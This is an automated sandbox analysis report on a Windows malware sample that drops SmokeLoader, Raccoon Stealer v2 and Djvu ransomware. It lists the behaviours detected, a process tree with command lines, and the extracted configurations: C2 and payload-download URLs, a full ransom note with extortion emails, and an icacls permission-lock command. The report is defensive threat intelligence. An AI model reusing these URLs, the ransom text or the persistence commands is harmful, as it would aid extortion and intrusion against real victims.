Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800784
MD5:17a74a0281cefb5d9c29022fbc79981a
SHA1:d88585c6c9488b6d28b71dd0659edb8649e32dca
SHA256:2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
Tags:exeRecordBreaker
Infos:

Detection

Djvu, Fabookie, Raccoon Stealer v2, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Connects to several IPs in different countries

Classification

  • System is w10x64
  • file.exe (PID: 4356 cmdline: C:\Users\user\Desktop\file.exe MD5: 17A74A0281CEFB5D9C29022FBC79981A)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 4113.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\4113.exe MD5: B141BC58618C537917CC1DA179CBE8AB)
      • 3046.exe (PID: 3680 cmdline: C:\Users\user\AppData\Local\Temp\3046.exe MD5: 46909DA148DE57B2D85591626AEDBD76)
        • 3046.exe (PID: 5672 cmdline: C:\Users\user\AppData\Local\Temp\3046.exe MD5: 46909DA148DE57B2D85591626AEDBD76)
          • icacls.exe (PID: 3460 cmdline: icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
          • 3046.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask MD5: 46909DA148DE57B2D85591626AEDBD76)
      • A33B.exe (PID: 3776 cmdline: C:\Users\user\AppData\Local\Temp\A33B.exe MD5: B328ABE938AE81E9382BD6858A6EE77F)
        • llpb1133.exe (PID: 2560 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: 81A0ECC23B44DA5116D397C0A3104A05)
        • pliu.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Local\Temp\pliu.exe" MD5: B9363486500E209C05F97330226BBF8A)
          • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • pliu.exe (PID: 5180 cmdline: "C:\Users\user\AppData\Local\Temp\pliu.exe" -h MD5: B9363486500E209C05F97330226BBF8A)
            • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • XandETC.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Local\Temp\XandETC.exe" MD5: 3006B49F3A30A80BB85074C279ACC7DF)
      • 98D7.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\98D7.exe MD5: 81A0ECC23B44DA5116D397C0A3104A05)
      • E4.exe (PID: 2096 cmdline: C:\Users\user\AppData\Local\Temp\E4.exe MD5: 29C3DE14DFFA53EDC7E690D0FC0ECCE2)
      • ECFB.exe (PID: 996 cmdline: C:\Users\user\AppData\Local\Temp\ECFB.exe MD5: 3A452937E8A961C5E19974C2CBB4AFAA)
        • WerFault.exe (PID: 4116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • D8D3.exe (PID: 5128 cmdline: C:\Users\user\AppData\Local\Temp\D8D3.exe MD5: 0CA939E14D58B13997144F0AF89ADEA9)
      • 3046.exe (PID: 3112 cmdline: "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart MD5: 46909DA148DE57B2D85591626AEDBD76)
      • 3046.exe (PID: 4084 cmdline: "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart MD5: 46909DA148DE57B2D85591626AEDBD76)
  • sievwvt (PID: 3176 cmdline: C:\Users\user\AppData\Roaming\sievwvt MD5: 17A74A0281CEFB5D9C29022FBC79981A)
  • 3046.exe (PID: 4424 cmdline: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task MD5: 46909DA148DE57B2D85591626AEDBD76)
  • cleanup
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApKaxnIXI+dNswr3BwHaz\\\\n2d48dsnCgVqNaCi3raCQH9vXnap8L2JxiWeoQF+T2OGE+ecKJpaifomH2NUPid9n\\\\n1YbThm64VJFv\\/QkGa3aGDfcOQJP+wnHTaJNGHnh\\/1JyhqlfJDJ\\/FZvINl4VJFyWS\\\\nJd\\/zSb4vp8WmkqCTPgQ5nH8fy1kL9c1Z8BQVhqzuCeiJVFn4QjIt7ct\\/vsQXfhOg\\\\nkmRpwR3oJ40fghjpkqxS+wreCfNIHPXHq8Ope0eOfQ9vXQQ2sapKLhE97+NJ0os0\\\\n4JoAS5yjNOCUk8aDxFTDbWCtnutApBuv93hFaMpbOlVDbBmBl+ZCXwyfyx8cMEzm\\\\npQIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\A33B.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
    • 0x75be97:$s1: Runner
    • 0x75bffc:$s3: RunOnStartup
    • 0x75beab:$a1: Antis
    • 0x75bed8:$a2: antiVM
    • 0x75bedf:$a3: antiSandbox
    • 0x75beeb:$a4: antiDebug
    • 0x75bef5:$a5: antiEmulator
    • 0x75bf02:$a6: enablePersistence
    • 0x75bf14:$a7: enableFakeError
    • 0x75c025:$a8: DetectVirtualMachine
    • 0x75c04a:$a9: DetectSandboxie
    • 0x75c075:$a10: DetectDebugger
    • 0x75c084:$a11: CheckEmulator
    SourceRuleDescriptionAuthorStrings
    00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x59db:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x6012:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 49 entries
        SourceRuleDescriptionAuthorStrings
        15.2.3046.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
        • 0xe0dea:$s1: http://
        • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe0dea:$f1: http://
        15.2.3046.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          15.2.3046.exe.400000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
          • 0xfe888:$x1: C:\SystemID\PersonalID.txt
          • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
          • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
          • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
          • 0xfecec:$s1: " --AutoStart
          • 0xfed00:$s1: " --AutoStart
          • 0x102948:$s2: --ForNetRes
          • 0x102910:$s3: --Admin
          • 0x102d90:$s4: %username%
          • 0x102eb4:$s5: ?pid=
          • 0x102ec0:$s6: &first=true
          • 0x102ed8:$s6: &first=false
          • 0xfedf4:$s7: delself.bat
          • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
          • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          15.2.3046.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          33.2.3046.exe.23515a0.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
          • 0xe0dea:$s1: http://
          • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
          • 0xe0dea:$f1: http://
          Click to see the 36 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://xv.yxzgamen.com/2701.htmlURL Reputation: Label: malware
          Source: https://xv.yxzgamen.com/logo.pngURL Reputation: Label: malware
          Source: http://77.73.134.27/llpb1133.exeURL Reputation: Label: malware
          Source: http://bihsy.com/lancer/get.phpAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeAvira: detection malicious, Label: HEUR/AGEN.1210601
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeAvira: detection malicious, Label: HEUR/AGEN.1210601
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeAvira: detection malicious, Label: HEUR/AGEN.1234960
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 34%Perma Link
          Source: potunulit.orgVirustotal: Detection: 16%Perma Link
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\3046.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\4113.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\AppData\Local\Temp\XandETC.exeReversingLabs: Detection: 91%
          Source: C:\Users\user\AppData\Local\Temp\db.dllReversingLabs: Detection: 42%
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeReversingLabs: Detection: 84%
          Source: C:\Users\user\AppData\Roaming\sievwvtReversingLabs: Detection: 48%
          Source: file.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\12C0.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\FB61.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\sievwvtJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\3046.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\E4.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\jhevwvtJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\4113.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeJoe Sandbox ML: detected
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Window
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

          Compliance

          barindex
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
          Source: unknownHTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
          Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00428390 FindFirstFileExW,

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 37.34.248.24 80
          Source: C:\Windows\explorer.exeDomain query: perficut.at
          Source: C:\Windows\explorer.exeDomain query: potunulit.org
          Source: C:\Windows\explorer.exeNetwork Connect: 190.219.54.242 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80
          Source: C:\Windows\explorer.exeNetwork Connect: 195.158.3.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 158.69.96.67 443
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 77.73.134.27 80
          Source: C:\Windows\explorer.exeDomain query: flytourchip.com.br
          Source: Malware configuration extractorURLs: http://bihsy.com/lancer/get.php
          Source: Malware configuration extractorURLs: http://bulimu55t.net/
          Source: Malware configuration extractorURLs: http://soryytlic4.net/
          Source: Malware configuration extractorURLs: http://bukubuka1.net/
          Source: Malware configuration extractorURLs: http://novanosa5org.org/
          Source: Malware configuration extractorURLs: http://hujukui3.net/
          Source: Malware configuration extractorURLs: http://newzelannd66.org/
          Source: Malware configuration extractorURLs: http://golilopaster.org/
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
